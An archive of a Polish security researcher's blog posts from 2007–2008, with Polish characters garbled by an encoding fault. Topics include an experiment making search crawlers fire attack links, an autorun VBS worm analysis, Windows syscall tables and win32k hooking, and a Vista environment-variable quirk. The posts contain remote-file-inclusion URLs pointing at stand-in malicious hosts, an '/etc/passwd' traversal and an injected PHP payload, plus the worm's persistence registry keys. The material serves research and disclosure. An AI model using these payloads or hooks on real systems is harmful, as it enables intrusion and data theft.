G.C. TechBlog

Umar� blog, niech �yje blog!

gynvael — Sat, 16 Aug 2008 11:14:16 +0000

Z powodu mojego niezdecydowania j�zykowego postanowi�em zawiesi� polskie i angielski blogi, i utworzy� jeden polsko-angielski ;>

Tak wi�c zawieszam dzia�alno�� tego blogu (i tak dawno tu nie pisa�em), i jednocze�nie zapraszam na m�j nowy blog: http://gynvael.coldwind.pl

Rise of the Robots - Sprz�enie zwrotne

gynvael — Sun, 26 Aug 2007 11:09:41 +0000

Hi,

Ca�kiem niedawno wpad�a mi w r�ce �wietna ksi��ka “Cisza w sieci” autorstwa Micha�a Zalewskiego (lcamtuf-a). W drugiej po�owie ksi��ki jest przedruk artyku�u z Phrack 0×39 “Rise of the Robots” (r�wnie� autorstwa lcamtuf-a). Artyku� sugeruje i� mo�na wykorzysta� roboty webowe (np. GoogleBot) do przeprowadzania atak�w na strony WWW oraz niekt�re us�ugi, po prostu podaj�c im linka kt�ry jednocze�nie przeprowadza atak, np:

http://alamakota.pl/skrypt.php?inc=http://zly.pl/evil.txt

W ramach eksperymentowania postanowi�em powt�rzy� opisany przez lcamtuf-a eksperyment, dodaj�c jeszcze jeden warunek - uzyskanie informacji zwrotnej na temat tego czy atak si� powi�d� oraz jego rezultat�w.� W tym celu na swojej stronie http://gynvael.vexillium.org stworzy�em trzy testowe linki:

Pewien test by gyn -> http://gynvael.lunarii.org/test.php?inc=../../../../etc/passwd
Inny test by gyn -> http://gynvael.lunarii.org/test.php?inc=http://zlosliwa.strona.haxxora.pl/zlosliwy.php
Kolejny test by gyn -> http://gynvael.lunarii.org/test.php?inc=%3C%3Fphp%20jakis(kod)%3B%20%3F%3E

Dodatkowo na stronie http://gynvael.vexillium.org w��czy�em skrypt loguj�cy odwiedziny. Skrypt test.php r�wnie� dok�adnie loguje wszelkie odwiedziny, dodatkowo, wywo�any z niepustym parametrem inc, listuje co� co mog�o by by� plikiem /etc/passwd.

Eksperyment trwa� nieca�y miesi�c, rozpocz�� si� 4 sierpnia. Pi�tego sierpnia o 00:42 przyby� na stron� z linkami pierwszy bot msnbot/1.0 (+http://search.msn.com/msnbot.htm), dwie minuty po nim pojawi� si� jaki� prywatny szperacz libwww-perl/5.80 z adresu amenti.chthonic.net. Yahoo! pojawi�o si� oko�o 8:16, a o 9:33 przyszed� GoogleBot. Yahoo! wr�ci�o jeszcze o 12:45 oraz 23:30. Sz�stego sierpnia pojawi� si� niejaki Gigabot/3.0 (http://www.gigablast.com/spider.html). I tak dalej. W ci�gu nieca�ego miesi�ca stron� odwiedzi�a ca�a masa bot�w, kt�re parsowa�y linki przeprowadzaj�ce atak, i za pewne zapami�tywa�y je w calu p�niejszego odwiedzenia.

Je�li chodzi o stron� atakowan�, pierwszy atak przeprowadzi� GoogleBot o godzinie 11:05 (czyli godzin� i 32 minuty po wizycie na stronie z linkami). Atak zosta� przeprowadzony na adres /test.php?inc=http://zlosliwa.strona.haxxora.pl/zlosliwy.php.

Na kolejny atak czeka� by�o trzeba ponad 4 dni. Dziewi�tego sierpnia pojawi� si� Slurp (bot Yahoo!) i “przeprowadzi� atak” na /test.php?inc=%3C%3Fphp%20jakis(kod)%3B%20%3F%3E. 15 minut po nim ten sam atak przeprowadzi� GoogleBot.

Kolejny atak odby� si� 16 sierpnia, wykona� go ponownie bot Yahoo! wchodz�c ponownie na /test.php?inc=%3C%3Fphp%20jakis(kod)%3B%20%3F%3E. 18 sierpnia pojawi� si� znowu GoogleBot wykonuj�c ponownie ten sam atak co Yahoo! dwa dni wcze�niej. Yahoo! wr�ci� na ten adres ponownie 23 sierpnia.

Co ciekawe, inne boty nie zainteresowa�y si� linkami.

Wniosek z eksperymentu w tym momencie brzmi: mo�na wykorzysta� boty do przeprowadzania atak�w (HTTP/GET, ew inne). W moim wypadku wystarczy�o poczeka� 1.5h, i atak zosta� przeprowadzony. Co ciekawe, po wizycie pierwszego bota google czy yahoo, mo�na linki usun�� ze strony.

Natomiast id�my o krok dalej. Mianowicie boty przeprowadza�y “atak” kt�ry powodowa� wylistowanie jakiego� wa�nego pliku. Jak uzyska� informacje o tym co w tym pliku by�o ? Z “pomoc�” przychodzi tutaj mechanizm cytowania stron na wyszukiwarkach, oraz mechanizm cache’owania stron.

Mechanizm cytowania polega na wy�wietlaniu fragmentu strony, kt�ry zawiera poszukiwany przez nas ci�g. Mo�na go u�y� do uzyskania ca�ej strony w bardzo prosty spos�b, mianowicie dodaj�c do zapytania ostatni wyraz (np nazw� u�ytkownika w przypadku /etc/passwd) widziany w podanym fragmencie (a usuwaj�c inne wyrazy). Dzi�ki temu w nast�pnym cytacie uzyskamy dalszy fragment strony. U�ycie mechanizmu cytowania wygl�da tak:

Mechanizm cache w wypadku google powoduje po prostu przywo�anie zawarto�ci strony z pami�ci wyszukiwarki. Mo�e da� to nast�puj�ce rezultaty:

Niestety cache Yahoo! nie zawiera� strony z etc/passwd:

Tak wi�c za pomoc� bot�w mo�na przeprowadzi� atak, oraz uzyska� informacje zwrotne na temat powodzenia ataku. Dodam �e strona w google cache pojawi�a si� dopiero pod koniec eksperymentu, czyli okres oczekiwania na wyniki jest d�ugi.

Podczas eksperymentu wysz�a jeszcze jedna ciekawa rzecz. Mianowicie linki testowe by�y publicznie dost�pne na gynvael.vexillium.org, i co ciekawe, odwiedzaj�cy moj� stron� bardzo ch�tnie je “klikali”. Je�li podczas eksperymentu atak przeprowadzi�o nieca�e 10 bot�w, to w logach mo�na spokojnie znale�� informacje o oko�o 100 “atakach” przeprowadzonych przez normalnych u�ytkownik�w. Co bardziej ciekawscy po pierwszym wej�ciu zaopatrzyli si� nawet w zagraniczne proxy i szperali dalej do czego inc= mo�na wykorzysta� :).
Natomiast ta informacja mo�e wskaza� kolejny wektor “atak�w” na kt�ry b�d� w przysz�o�ci nara�eni normalni u�ytkownicy. Wystarczy poda� na forum czy w przys�owiowych “komentarzach onet” jaki� link (np. dodatkowo “spakowany” za pomoc� tiny.pl), a ludzie na pewno na niego “klikn�”, czyli de facto, przeprowadz� “za nas” atak na jaki� serwer. Prosz� zauwa�y� �e nawet “klikanie” na link mo�na pomin��, cho�by poprzez wstawienie “atakuj�cego linku” jako awatar na jakim� forum. W takim wypadku wystarczy by u�ytkownik odwiedzaj�cy forum po prostu wszed� na stron�, a ju� bezwiednie przeprowadza atak. Taka metoda atak�w mo�e bardzo utrudni� zlokalizowanie prawdziwego napastnika.

OK Tyle,

G.C.

ps. je�li kto� jeszcze nie czyta� “Ciszy w sieci”, to bardzo polecam ;>, mega ksi��ka

Microsoft Vista i zmienne �rodowiskowe.

gynvael — Tue, 31 Jul 2007 10:51:28 +0000

Hi,

Podczas pisania (to jeszcze nie jest czas przesz�y uko�czony ;>) tutoriala po�wi�conego j�zykowi skryptowemu .bat (batch) natkn��em si� na pewne ciekawe niedopatrzenie, lub jak kto woli - feature, w Windows Vista, dotycz�cy zmiennych �rodowiskowych. Jak ka�dy kto pisa� kiedy� co� w j�zyku .bat wie, istnieje mo�liwo�� deklarowania nowych zmiennych �rodowiskowych, dla w�asnego procesu oraz proces�w potomnych, za pomoc� instrukcji SET, np. SET NAZWA=WARTOSC. W skryptach .bat maksymalna wielko�� warto�ci (w znakach) zale�y od interpretera, a dok�adniej od ograniczenia maksymalnej wielko�ci wiersza polece�. Interpreter Windows NT 4 oraz Windows 2000 posiada� ograniczenie 2048 znak�w, Windows XP oraz 2003 zwi�kszy�o limit do 8192, natomiast Windows Vista nie nak�ada ograniczenia na ilo�� znak�w w przypadku komendy SET.

Prosty skrypt w kt�rym najpierw tworzymy d�uuug� zmienn�, a potem j� wypisujemy za pomoc� komendy SET NAZWA pokazuje �e maksymalna wielko�� zmiennej (wraz z jej nazw� oraz znakiem r�wno�ci) wynosi 8192 bajty, przy czym zjadany jest nawet znak ko�ca linii przy wypisywaniu.

Ah, ale czy na pewno o tym m�wi taki skrypt ? Nie do ko�ca. Mianowicie skrypt m�wi �e maksymalna d�ugo�� linii przewidziana w poleceniu SET wynosi 8192. Jak wi�c ustali� maksymaln� d�ugo�� zmiennej ? Mo�na zajrze� do listingu interpretera CMD.EXE i poszuka� implementacji funkcji SET. W implementacji znajdziemy funkcj� SetEnvironmentVariablW, kt�ra najwyra�niej jest odpowiedzialna za ustawienie zmiennej. Rzut okiem na MSDN i wiemy �e:

The total size of the environment block for a process may not exceed 32,767 characters.

Czyli dowiedzieli�my si� �e maksymalna wielko�� bloku zmiennych �rodowiskowych dla procesu wynosi 32767 znak�w. OK. Ale czemu by tego nie przetestowa� ? Mo�na stworzy� wi�c prosty programik kt�ry, korzystaj�c z trzeciego parametru funkcji main(), wypisze wszystkie zmienne �rodowiskowe, czyli zadzia�a tak jak SET. Programik mo�e wygl�da� nast�puj�co:

#includeint main(int argc, char **argv, char **envp) { while(*envp) { puts(*envp); envp++; }return 0; }

Tworzymy ponownie zmienn� �rodowiskow�, powiedzmy tak� o d�ugo�ci wst�pnej 40000 znak�w, i zgodnie z dokumentacj� oczekujemy �e jej wielko�� b�dzie wi�ksza ni� 8192 znaki kt�re wypisuje SET, ale mniejsza ni� 32767 znak�w. Odpalamy i… okazuje si� �e zmienna ma 40000 znak�w. Huh.

Jak wspomnia�em wcze�niej, SET korzysta z SetEnvironmentVariable. Mo�na wi�c napisa� prosty program kt�ry upewni si� �e ta funkcja faktycznie mo�e stworzy� zmienn� powy�ej 32767 znak�w:

#include #includeint main(void) { static char big[40000 + 1]; int i;for(i = 0; i < sizeof(big) - 1; i++) big[i] = 'A';if(!SetEnvironmentVariable("big", big)) printf("ERROR %i\n", GetLastError());return 0; }

Kompilujemy, odpalamy, i… Nie dzia�a, ERROR 87 czyli ERROR_INVALID_PARAMETER. Ciekawe. Po por�wnaniu listing�w okazuje si� oczywi�cie �e my u�ywamy funkcji A, natomiast interpreter korzysta z funkcji W, czyli wersji wide-char. Teoretycznie obie funkcje powinny dawa� identyczne rezultaty, jednak czy na pewno tak jest ? Przetestujmy:

#include #includestatic char big_c[1024*1024]; static short big_s[1024*1024];int main(void) { int i;for(i = 0; i < 1024*1024 - 1; i++) { big_c[i] = 'A'; big_s[i] = 'A'; }printf("W: %i\n", SetEnvironmentVariableW(L"S",big_s)); printf("A: %i\n", SetEnvironmentVariableA("A",big_c));return 0; }

Windows Vista pokaza�a wynik W: 1 oraz A: 0. Sk�d ta r�nica? Odpowiedzi� kt�ra si� nasuwa jest “panowie z MS zapomnieli sprawdzania wielko�ci w wersji W, a maj� j� w wersji A”. Natomiast tak nie do ko�ca jest. Jak wynika z analizy listingu obu funkcji, nie ma w �adnej sprawdzania wielko�ci. Sk�d wi�c b��d w funkcji A? Ot� wersja ANSI funkcji, jak to jest w wi�kszo�ci przypadk�w, konwertuje stringi ANSI na stringi Wide-Char, po czym wywo�uje funkcj� W, lub funkcj� realizuj�c� dane dzia�anie kt�ra znajdzuje si� w NTDLL.DLL. W tym wypadku mamy do czynienia z tym drugim, mianowicie obie funkcje wywo�uj� RtlSetEnvironmentVar (A zachacza jeszcze o RtlSetEnvironmentVariable, ale to bez znaczenia). St�d wniosek, �e b��d jest generowany w momencie konwersji ANSI na Wide-Char. I faktycznie, w funkcji RtlInitAnsiStringEx znajdujemy nast�puj�ce instrukcje:

cmp eax, 0FFFEh ; w EAX jest d�ugo�� stringu ja loc_ERROR[...]ERROR: mov eax, 0C0000106h ; STATUS_NAME_TOO_LONG pop ebp retn 8

Najwyra�niej funkcja RtlInitAnsiStringEx nie dopuszcza przyd�ugawych string�w. C�.

Jakie s� tego implikacje? Raczej nic powa�nego, jako �e zmienne �rodowiskowe utworzone w danym procesie i tak s� przekazywane tylko do jego dzieci. Ale jednak s�, wi�c przyk�adowo je�li utworzymy zmienn� o d�ugo�ci 100MB i uruchomimy 20 kalkulator�w to zu�yjemy ca�� pami�� systemu (taki eksperyment u mnie sko�czy� si� 10 minutowym zawieszeniem systemu, po tym czasie system si� jednak odwiesi� i dalej dzia�a� ju� normalnie; pagefile wida� d�ugo by� tworzony). Inn� implikacj� mog� by� problemy je�li program-dziecko korzysta nieumiej�tnie ze zmiennych �rodowiskowych (strcpy(zmienna, envp[2]) ;>). Tak jest na przyk�ad w przypadku interpretera polece� Windows NT4, kt�ry, je�li uruchomiony w momencie gdy w �rodowisku jest zmienna powy�ej okre�lonej wielko�ci, po wydaniu komendy SET najzwyczajniej w �wiecie si� wysypa� (ACCESS_VOLATION). Na szcz�cie nikt nie u�ywa interpretera z NT4 na Vi�cie.

Z moich test�w wynika i� problem dotyczy jedynie Windows Vista. Na XP ani funkcja A, ani funkcja W nie pozwalaj� na alokacje przyd�ugawych zmiennych �rodowiskowych.

K tyle. G.C.

Syscall lister

gynvael — Tue, 10 Jul 2007 09:41:58 +0000

Hi,

Wczoraj omega red opublikowa� bardzo ciekawy moim zdaniem program do listowania syscalli na systemach z rodziny Windows, za r�wno 32 bitowych, jak i 64 bitowych.

Warto rzuci� okiem imho ;>

Link: http://www.openrce.org/blog/view/808/Syscall_lister

G.C.

Slow but sure V0.05

gynvael — Mon, 09 Jul 2007 07:56:04 +0000

Hi,

Wczoraj zosta�em poproszony o rzucenie okiem na kompa, z zainstalowanym systemem Windows XP, na kt�rym “nie dzia�a�o” otwieranie dysk�w poprzez dwuklik na ikonk� dysku w Moim Komputerze. Powodem okaza� si� worm, napisany w VBS, przedstawiaj�cy si� jako “Slow but sure V0.05″. Worm ma co� ponad 50 unicode’owych linijek, i niezwykle prost� i skuteczn� zasad� dzia�ania. Mianowicie, ofiara dostaje worm’a na przeno�nym no�niku (np. pendrive) na kt�rym worm wcze�niej utworzy� dwa pliki:

autorun.inf - z rozkazem wykonania (shellexecute) komendy “wscript.exe MS32DLL.dll.vbs”
MS32DLL.dll.vbs - kopia worma

Po w�o�eniu no�nika i dwukliku na jego ikon� Windows (nie wiem jak na SP 2, komputer z kt�rym mia�em do czynienia by� offline i nie mia� SP �adnego) pi�knie uruchamia polecenie o kt�rym mowa w autorun.inf. Uruchomiony worm kopiuje siebie oraz autorun.inf do roota ka�dego dysku. Po za tym wykonywana jest kopia worma do katalogu Windows’a. Worm tworzy dodatkowo 3 wpisy w rejestrze:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL - z warto�ci� C:\Windows\MS32DLL.dll.vbs (przy czym warto�� zale�y od faktycznej �cie�ki do Windows’a)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title - z warto�ci� “Hacked by Godzilla”
HKCR\vbsfile\DefaultIcon - z warto�ci� “shell32.dll,2″

Po czym zasypia na 200 sekund, chyba �e natknie si� na dysk typu “Removable”. W przypadku gdyby natkn�� si� na taki dysk uruchamia polecenie “c:\windows\explorer.exe /e,/select, SCIEZKA_DO_SKRYPTU”. I tyle. A, zapomnia�em doda� �e autorun.inf oraz plik skryptu maj� atrybuty poustawiane na ASHR.

Usuni�cie worm’a jest proste. Mianowicie wystarczy skillowa� (ctrl+shift+esc) wszystkie wscript.exe, po czym usun�� pliki autorun.inf i MS32DLL.dll.vbs z root�w dysku i katalogu Windows’a. Ewentualnie (;p) mo�na jeszcze usun�� dodane wpisy w rejestrze.

OK tyle ;>

G.C.

Syscalle w XP i pewne ciekawostki cd.

gynvael — Sat, 07 Jul 2007 08:01:17 +0000

Hi,

Wczoraj po rozmowie z deus’em mnie o�wieci�o czemu niekt�rych syscalli jest wi�cej. Sprawa okazuje si� by� trywialna, jak zawsze. Okazuje si� i� wi�kszo�� tych “powtarzaj�cych si�” syscalli to po prostu funkcje zwracaj�ce STATUS_NOT_IMPLEMENTED (aka C0000002h). Wi�kszo�� tych syscalli jest wi�c zaimplementowana przez jedn� funkcj�, dlatego wydaje si� �e si� powtarzaj�.

Tak wi�c STATUS_NOT_IMPLEMENTED zwracaj�:

“NtQuerySystemEnvironmentValueEx” implementuj�ca niezaimplementowane funkcje z 14h bajt�w argument�w (RETN 14h): ACh, EFh
“NtEnumerateSystemEnvironmentValuesEx” implementuj�ca niezaimplementowane funkcje z 0Ch argument�w (RETN 0Ch): 48h
“NtModifyBootEntry” implementuj�ca niezaimplementowane funkcje z 4roma bajtami argument�w (RETN 4): 15h, 3Dh, 6Dh
“NtEnumerateBootEntries” implementuj�ca niezaimplementowane funkcje z 8smioma bajtami argument�w (RETN 8): 9, 46h, 8Ch, 8Dh, D3h, D4h
“NtTranslateFilePath” implementuj�ca niezaimplementowane funkcje z10h bajt�w argument�w (RETN 10h): 105h

Czyli, wg oznacze� z Metasploit Project, niezaimplementowane syscalle to: NtAddBootEntry, NtEnumerateBootEntries, NtQueryBootEntryOrder, NtQueryBootEntryOrder, NtSetBootEntryOrder, NtSetBootOptions, NtTranslateFilePath, NtCancelDeviceWakeupRequest, NtDeleteBootEntry, NtModifyBootEntry, NtEnumerateSystemEnvironmentValuesEx, NtQuerySystemEnvironmentValueEx oraz NtSetSystemEnvironmentValueEx.

K tyle ;>

Syscalle w XP i pewne ciekawostki

gynvael — Fri, 06 Jul 2007 14:03:21 +0000

Hi,

Natrafi�em wczoraj na pewne ciekawostki zwi�zane z tablic� syscalli j�dra (KiServiceTable)� w XP.

Pierwsz� spraw� jest syscall NtEnumerateBootEntries kt�ry w tablicy pojawia si� 6 (s�ownie: sze��) razy, na pozycjach 9h,� 46h, 8Ch, 8Dh, D3h oraz D4h. Co ciekawe, lister syscalli by omega_red pokazuje (u niego) w tych miejscach syscall NtSetBootOptions.

Jeszcze ciekawsze jest to, �e w podanych wy�ej miejscach wg. listy syscalli na metasploit project� znajduj� si� kolejno:

9h NtAddBootEntry
8Ch NtQueryBootEntryOrder
8Dh NtQueryBootOptions
D3h NtSetBootEntryOrder
D4h NtSetBootOptions

Na pozycji 46h znajduje si� faktycznie NtEnumerateBootEntries.

Z pocz�tku my�la�em �e to co� nie tak u mnie z kernelem/symbolami, ale po kilku kolejnych testach na wirtualnych maszynach (+windbg) oraz poproszeniu kilku os�b (thx omeg, fr3 & deus) o ich kernele / testy wysz�o �e faktycznie tak po prostu jest.

Je�li chodzi o inne r�nice mi�dzy list� syscalli Metasploit Project, to:

15h, wg symboli NtModifyBootEntry, wg Metasploit Project NtCancelDeviceWakeupRequest
3Dh, wg symboli NtModifyBootEntry, wg Metasploit Project NtDeleteBootEntry
EFh, wg symboli NtQuerySystemEnvironmentValueEx, wg Metasploit Project NtSetSystemEnvironmentValueEx

Wygl�da wi�c na to �e NtModifyBootEntry pojawia si� r�wnie� wi�cej ni� raz.

Ciekawe z czego te r�nice wynikaj�. I dlaczego niekt�rych syscalli jest tak du�o, a innych “brakuje”.

K tyle. G.C.

ps aux

gynvael — Wed, 27 Jun 2007 23:45:49 +0000

Hi ponownie,

Jeszcze jeden kr�ciutki post dzisiejszego wieczoru. Taka ma�a “cytatowa” historyjka pod tytu�em “dlaczego ps aux nie powinno pokazywa� proces�w innych user�w” ;>

reiko 3184 0.0 1.3 263248 13552 pts/5 Sl+ Jun27 0:00 java -cp .:mysql_jdbc2.0.jar NickServer –nsport 14992 –dbdriver org.gjt.mm.mysql.Driver –dbconnection jdbc:mysql://localhost/reiko_czat?user=reiko_czat&password=sthchatr3ik000

hovik 7670 0.0 1.3 263760 13708 ? Sl Jun27 0:01 java -cp .:mysql_jdbc2.0.jar NickServer –port 14998 –dbdriver org.gjt.mm.mysql.Driver –dbconnection jdbc:mysql://localhost/hovik_hotczat?user=hovik_hoczat&password=sthchat777y

Dla bezpiecze�stwa user�w has�a troszk� zmieni�em ;> Niemniej jednak wida� o co chodzi. C� ;>

G.C.

Hookowanie syscalli z win32k

gynvael — Wed, 27 Jun 2007 23:38:27 +0000

Hi,

O ile hookowanie syscalli zawartych w kernelu Windowsa z rodziny NT, czyli ntoskrnl, nie sprawia �adnych problem�w, o tyle w przypadku syscalli odpowiedzialnych za GUI jest troch� wi�cej kombinowania. Ale po kolei.

Ka�dy thread pod WinNT ma okre�lony zestaw syscalli (KSERVICE_TABLE_DESCRIPTOR[]) z kt�rego mo�e korzysta�. Na dobr� spraw� mamy dwa takie zestawy:

KeServiceDescriptorTable - zawieraj�cy jedynie odniesienie do syscalli z ntoskrnl
KeServiceDescriptorTableShadow - zawieraj�cy odniesienie za r�wno do syscalli z ntoskrnl, jak i win32k

Domy�lnie ka�dy utworzony thread ma przypisany (Thread->Tcb.ServiceTable) pierwszy zestaw, czyli KeServiceDescriptorTable. Symbol tego zestawu jest wyexportowany, wi�c zlokalizowanie zestawu oraz tablicy syscalli nie jest �adnym problemem.

W przypadku kiedy thread wywo�a jaki� syscall >= 0×1000, np NtUserFindWindowEx (poprzez np funkcj� FindWindow), uruchamiana jest procedura PsConvertToGuiThread() (base\ntos\ps\psquery.c) kt�ra mi�dzy innymi podmienia zestaw syscalli na KeServiceDescriptorTableShadow.

I tutaj zaczynaj� si� “schody”. Mianowicie KeServiceDescriptorTableShadow nie jest exportowany przez kernel, czyli w legalny spos�b nie mo�na si� do tego dobra�. Ale OK, tak w zasadzie wystarczy tylko adres tablicy syscalli (_W32pServiceTable) w win32k, bo to pointery w tej tablicy podmieniamy.� Niestety, _W32pServiceTable r�wnie� nie jest eksportowany.

Wyj�� jest oczywi�cie kilka:

Sprawdzi� w symbolach gdzie jest KeServiceDescriptorTableShadow lub _W32pServiceTable i u�y� tego adresu (jako sta�ego). Niestety co patch na kernel/win32k trzeba ten adres ponownie sprawdza�.
Alexander Volynkin zaproponowa� przeszukanie wszystkich adres�w wyst�puj�cych w funkcji KeAddSystemServiceTable, tak aby natrafi� na adres kt�ry wskazuje na struktur� wype�nion� identycznymi danymi jak KeServiceDescriptorTable, ale jednak nie b�d�c� pod tym samym adresem (pierwszy wpis w obu strukturach w ko�cu jest identyczny, bo opisuje tablic� syscalli z ntoskrnl). Jest to niez�a metoda, chocia� troch� “hackish” (jak to mawia pewien m�j pro znajomy ;>).
�R�ni ludzie proponuj� aby poszuka� identycznego wpisu jak pierwszy z KeServiceDescriptorTable gdzie� w okolicy (+- 256 bajt�w) KeServiceDescriptorTable. Faktycznie KeServiceDescritorTableShadow jest umieszczany zazwyczaj przez kompilator w tych okolicach (w �r�dle kernela obie struktury s� ko�o siebie), jednak to nie jest zbyt pewna metoda. Niemniej jednak p�ki co skuteczna.
Mo�na przeszuka� DriverEntry win32k na odwo�ania do KeAddSystemServiceTable, w ko�cu ta funkcja jako parametr przyjmuje adres tablicy syscalli (push offset _W32pServiceTable). Ta metoda nie brzmi jednak zbyt pewnie.
Mo�na poczeka� a� driver zostanie wywo�any w kontekscie threadu z “pe�nym” zestawem syscalli (np. u�y� procedur powiadamiania o zniszczeniu w�tku i poczeka� a� si� jaki� trafi, a one cz�sto si� trafiaj�), po czym odczyta� z Thread->Tcb.ServiceTable adres tabeli syscalli.
Mo�na przeszuka� list� thread�w i zobaczy� kt�re maj� inn� zestaw inny ni� KeServiceDescriptorTable.
Ewentualnie mo�na podmieni� procedur� obs�uguj�c� SYSENTER i zobaczy� gdzie ona szuka/skacze. Ta metoda jednak nie jest najszcz�liwsza (nie spe�nia zasady KISS ;>).
etc.

Metod jest du�o, wszystkie jednak zmuszaj� do uciekania si� do pewnych sztuczek. C�, czasem wa�ne �eby po prostu dzia�a�y.

To niestety nie koniec “schod�w”. Okazuje si� �e w przypadku Windowsa XP (nie wiem jak z nowszymi) win32k nie zawsze jest widoczny w pami�ci wirtualnej. Owszem, jest zawsze w pami�ci fizycznej, ale je�li dany thread nie jest ustawiony jako GUI, to win32k nie jest zamapowany do pami�ci wirtualnej, nawet w przypadku gdy thread dzia�a kernel mode. To wymaga znowu kombinowania. Metod znowu jest kilka:

Znale�� win32k w pami�ci fizycznej i zamapowa� go “r�cznie”. Szybko�� nie jest mocn� stron� tej metody.
Postara� si� aby podmiana syscalli nast�powa�a w momencie gdy driver dzia�a w kontekscie threadu GUI (patrz poprzednia metoda z PsSetCreateProcessNotifyRoutine tudzie� PsSetCreateThreadNotifyRoutine, lub mo�na te� cz�� dzia�aj�c� w user mode poprosi� o “dotkni�cie” drivera po uprzednim zainicjowaniu GUI).

Osobi�cie skorzysta�em z tej drugiej metody. Nyom. Po rozwi�zaniu takich dw�ch problem�w mo�emy si� cieszy� sliczymi hookami w win32k.

Dodam jeszcze na koniec �e nale�y uwa�a� przy korzystaniu ze �r�de� ReactOS do okre�lania parametr�w przyjmowanych przez dany syscall. Okazuje si� i� mimo �e ReactOS ma by� w 100% kompatybilny z Windows’em, to nie wszystkie rzeczy s� zachowane. Przyk�adem mo�e by� NtUserFindWindowEx kt�ry w przypadku ReactOS pobiera 16 bajt�w parametr�w (4 x 4 bajty), a� przypadku Windows XP 20 bajt�w parametr�w (5 x 4 bajty). C� ;>

Dobra, to tyle ;>
Zach�cam do komentowania tego oraz poprzednich post�w ;>

G.C.

Back, Komputery z hipermarket�w

gynvael — Tue, 26 Jun 2007 00:24:03 +0000

Hi =^^=

Pierwszy post po przeprowadzce. Uff. Jeszcze sporo latania co prawda zosta�o, ale sytuacja si� stabilizuje i powoli wracam do normalnego trybu. Moje stanowisko pracy te� zaczyna wygl�da� normalnie (tj ju� mam biurko na kt�rym mo�na by�o PCta rozstawi� =^^=).

Anyway, dzisiejszy post b�dzie do�� kr�tki. I dotyczy� b�dzie pewnego zjawiska kt�re mnie zastanowi�o ostatnio (a w zasadzie ju� jaki� czas temu).

W wi�kszo�ci hipermarket�w znajdziemy jaki� duu�y sklep z elektronikom typu MediaMarkt czy Saturn. W takich sklepach opr�cz peryferi�w mo�na naby� te� ca�e zmontowane kompy z zainstalowanym systemem etc. Oczywi�cie pewn� kwesti� jest czy op�aca si� kupowa� z�o�onego kompa w takim sklepie, ale ja nie o tym. Pewnym imho zaniedbaniem ze strony tych�e sklep�w jest wystawianie na widok seriali zainstalowanych system�w operacyjnych. �w seriale s� w postaci �licznych naklejek naklejone na g�r� obudowy i w sumie tylko czekaj� a� kto� je spisze. P� biedy je�li system na takim PC by� ju� aktywowany. Ale co je�li nie by� ? Uczciwy nabywca po zakupie mo�e stwierdzi� �e jego klucz jest ju� u�ywany, bo wcze�niej kto� przyszed� z kom�rk� i zrobi� fotk� kilku ciekawym “obudowom”. Problem dotyczy te� laptop�w. One co prawda maj� seriale od system�w operacyjnych nalepione zazwyczaj na spodzie, ale (niespodzianka) mo�na je podnie�� ;p. C�. Ciekawe ile reklamacji b�dzie trzeba a� tego typu sklepy zaczn� przynajmniej zas�ania� seriale.

No nic, motto na dzi�.. po co komu keygen jak jest MediaMarkt ;p

Do jutra ;>